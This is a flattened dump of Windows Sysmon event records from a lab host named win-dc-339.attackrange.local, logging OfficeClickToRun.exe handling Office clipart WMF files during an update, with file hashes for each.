23542300x800000000000000065708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107350.WMFMD5=B30B4CAE9D5CC7C9EE8943D987E6037C,SHA256=F38D4F6D5A3CCDEB8A5840308432E6FF815A33FE5897E90B87F147100DDB39FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107344.WMFMD5=77C43E201603BC030A944BD6FCC42B21,SHA256=746132F6A4D334C745AE3DE80E0BB40700D0D0CD30F6FD9116A01A22BFE8FD0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107342.WMFMD5=B01BEAD21B7E20F8D10425E5AC994C67,SHA256=2232774657214802A545B42440A346F49918D8F30EE750E76AE4474478731AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107328.WMFMD5=2593353C75AF6848DE8617ED1EEC992F,SHA256=8669572A1DF74737A59DDC90DEE7C17065D5828819F5B84AEA9184906088C691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107316.WMFMD5=8F481576CAB51EAB9E0B403E0D6C8B2B,SHA256=9C4A8C1B6EB6BD35131C1356AD5D86845A98E4C8D98EBFD94E6A62F03352D777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107314.WMFMD5=73F1A5C5D982E8EE2C74A64DBC41FBED,SHA256=D6CDFFEE68858179383E2EDABCF721F35CE1E33F3684E6E1B6FBBE42AE6C2FB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107308.WMFMD5=041F9284A3F9BF1427FF0EF8EF762DB2,SHA256=0750A9531F5B78955AD649A9270746D2C4FBE038271C586199842DE8AC82E67E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107302.WMFMD5=FA00557D51586714D7CF453C3A352ECC,SHA256=5E7C9564023044425A45100B61C767C7F9C4BF82AFF5E7DF53EA541356EE223B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107300.WMFMD5=1B68B373C07352AD7CEDA5C419E9E076,SHA256=13E80C7A17A285B7824EB5F522FF701735E51F5020D14AF07AD15AAD62EA7A12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107290.WMFMD5=E52B3EF5263BA323CD19F35DDEC7353C,SHA256=84FB66F62085A4D0FAF4EECA796C681A0E596FCB8171864C27883C804539834B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107288.WMFMD5=BD4ECA4AB9BD290854238034731A1BDE,SHA256=8F00960F90DF59F5F16F6EDF5CD78237EA102DAECC1514E7526CC6428576C241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107282.WMFMD5=6DAE07F8CA485D215572DC61255D1174,SHA256=835938D00F054D1ABC2F26F66FC4DF95423B80C68012F1304A2B2C1247EE1C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107280.WMFMD5=D094762BAEF1E379F29C9A62D233D1CB,SHA256=C69132474C2C0C0C4DDDA5969206B2FADFBB66E87F6401829CA993D31D82B83E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107266.WMFMD5=F225EEB3067F0617570A69BA1EE47FCC,SHA256=37712DC05421442BA1ACCACA2F9C2C9AECC3F1F12A7F97292F0B9A8E70B673F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107264.WMFMD5=F2B77777301AFE4E26DA77F492935337,SHA256=829A02CC6D9A93F5A0BBD146A8F7A7CD22978DBEC0C226BC5A056A6358A8D74F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107262.WMFMD5=D94A0C98EA2C4EFDCC6EE7F61146B821,SHA256=3B1F10F6F4707EBB6F88013DA0456774766E83ABC70E06B869685FD59E0CE5CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107258.WMFMD5=06D78413B1F2D78F5E3791804132AE1C,SHA256=CDD5040B84E3D3292442E36B5248C20F97DF33F88C42F020E0B67F2D697A6F36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107254.WMFMD5=17679B587243322A5438116493551B4C,SHA256=839444B8A0F2D71C3BAFA59776894C987D9E8404C0B52CEF65CD3F86ED35FF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107192.WMFMD5=35245B106CB92CFD66AFE08AC2DA1E77,SHA256=392F4C2DFFC09E93150734BDB21C769B88FCC4060272D1B825D7033B2855BD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107188.WMFMD5=1ACF0D5CB16037E046BFF2114BE41B43,SHA256=A45E360DF53799CD3B0224E4E448B176CF97447FDF8998CF9539C8139181B557,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107182.WMFMD5=D1A3501D02DFA12E0EE188510CB18303,SHA256=BD78457FE4253F11731E04546FF152FB40F72A0B5BD87F77707C98B240A3DCE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107158.WMFMD5=E7FCF3CD2341BA1EE121E0338D828401,SHA256=D65D5CE2F23BD06ED1D9AFDC9FE0A0D8F415D1E5F14BE216FDBE974B853ADD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107154.WMFMD5=D83DC9F78B38253CE0E73A8E0A86A65F,SHA256=9476A1F49D1F7DF37B48A0B0C40FC6557A284A4D5835D37240E2B1D7BD0E9C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107152.WMFMD5=AC1331EEC5484B7DB4EC5E352E49563A,SHA256=542675FFBC864E779C75FD5CAAAD0B40E4FD3254CBAF212ECF8C8A8048B7FBE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107150.WMFMD5=2992CBF5817D5391553AB1FEF43E4912,SHA256=C454D4EBC9F6F79A38D71D182600B0A20A9125F479707773F193A2ADC279F82D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107148.WMFMD5=CAFD94202BFD3A667DEE639A30698C38,SHA256=1E87F8318C4DCDFE68E0D029F5F9E170877175E76707CE2614E985E6F10C0273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.877{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107146.WMFMD5=83673DE26BF4172F86A6FB0890C37F2A,SHA256=84A734E306FAF290DF94B91C796EBFD0139A21BFA89F61B0F6804F34970B991C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107138.WMFMD5=6BF8389BEFBDEC0C03E66EB756DEDB33,SHA256=85F8B3C4F1607D856BDA9A1CB1BF865A260704441A630DDDA91ADA4CA05B0BEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107134.WMFMD5=A2E03F1BD23B96CD7B26B0BC22B46B48,SHA256=82D4BC4008E5A2D49284D61FDA2580794C781ED7E3ECCD92BF28AFCC4A9B9058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107132.WMFMD5=356C043D204FF7D1E08099061535B6BF,SHA256=54A4260A5413DCEF1554173A7202D8C0FD6506B42713381DD018D5A1E830B883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107130.WMFMD5=988CDA7140299372FEA7BB8E3D7CF43E,SHA256=92EA912359B4A07EB342E85D6F40393E4F8E6837CCBDA3196EB812C1A5EDE687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107090.WMFMD5=5BC07D3228DC622E76C70F5017722224,SHA256=1EF3DB9939BE5A270B1826544502C4D6FBE2A7E3415C1580EFAD1EFB6687C36D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107042.WMFMD5=7DEACE4E95A43FDE57408B22B43F5E4E,SHA256=6EBBF393AFA4CD94A85F56298DBD4552B695ACEA6FCDBC62F82F68E208EA4563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107026.WMFMD5=F366BF52755CB76DAF93FDE082F0F0E8,SHA256=179D89682FCC2823237232DA2529EF53F1294D43A5E8D78E41E741EDFD244404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107024.WMFMD5=CE7DB2DC022D2FD2FB6D3723CAF9858A,SHA256=A5EFDAA63E1BBAE94AA850B9006A4771AC34A47D9D7E7087FD09319815C71ACB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106958.WMFMD5=9CDB1D1C4CB6A6DB454F4AC30B4A63E0,SHA256=94D8E49F7C4C0DEC64C14B6FA4369D58B177EA030D7BAF7FA87AC2E543203FC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106816.WMFMD5=C9499523E37530DAA8C8712A43123180,SHA256=D9151DABBC528DA69807C83CE2D9FF3EE5ECA0710F34706F7C98F28BE27251DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106572.WMFMD5=578925099E09C5B35CC8BEE509A53852,SHA256=74D010E2BA2963AB521CFDFADCAB7673622CB4E772550E8BE4A1C0C2BE1DA1E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106222.WMFMD5=054F32AC8EFA5945695F755E0E01CB09,SHA256=13106A255856C81B0C3AD7F7D8E18614860D813083660557A4E1303117081695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106208.WMFMD5=AB2B9BE252CE5F4F9122937A5796384B,SHA256=66BC0CDE2F1064B73953C39F2B6032EA06769845FBDF561301EECE326E3FE1E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106146.WMFMD5=497C90AB3F1833B5EECC47CC282C05C3,SHA256=C9C636B7D336C41E264D75498CB10D2E0F7C99ABB90C30491FAF6E5949884FEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106124.WMFMD5=87CED83CFE30978738A07FC0F210824C,SHA256=B5D066CD1FF035A196611006CC2D4C2DCC639E4C2B9067335ED8F318914E5E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0106020.WMFMD5=3F3A61B3CC0CDCF2BFBD1DB085F1E901,SHA256=9BD06E0678F80027B9DCFAD6862D597328B2A0F6DE042406382AE682ACCCCC66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105974.WMFMD5=9DF07C0FF0C02B9D40917F93903C4BDB,SHA256=A6E1C9B47320488AC544EEEC830CA4445E59A7611226CF8B2FF522F911D31EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0105912.WMFMD5=5C0CC3C0AC66C3CF4CF3F86E190067B6,SHA256=7923E9EFB490C182F4100AD0A5273A1F346A60127CABDEE8F863DACBD06BB53B,IMPHASH=00000000000000000000000000000000falsetrue 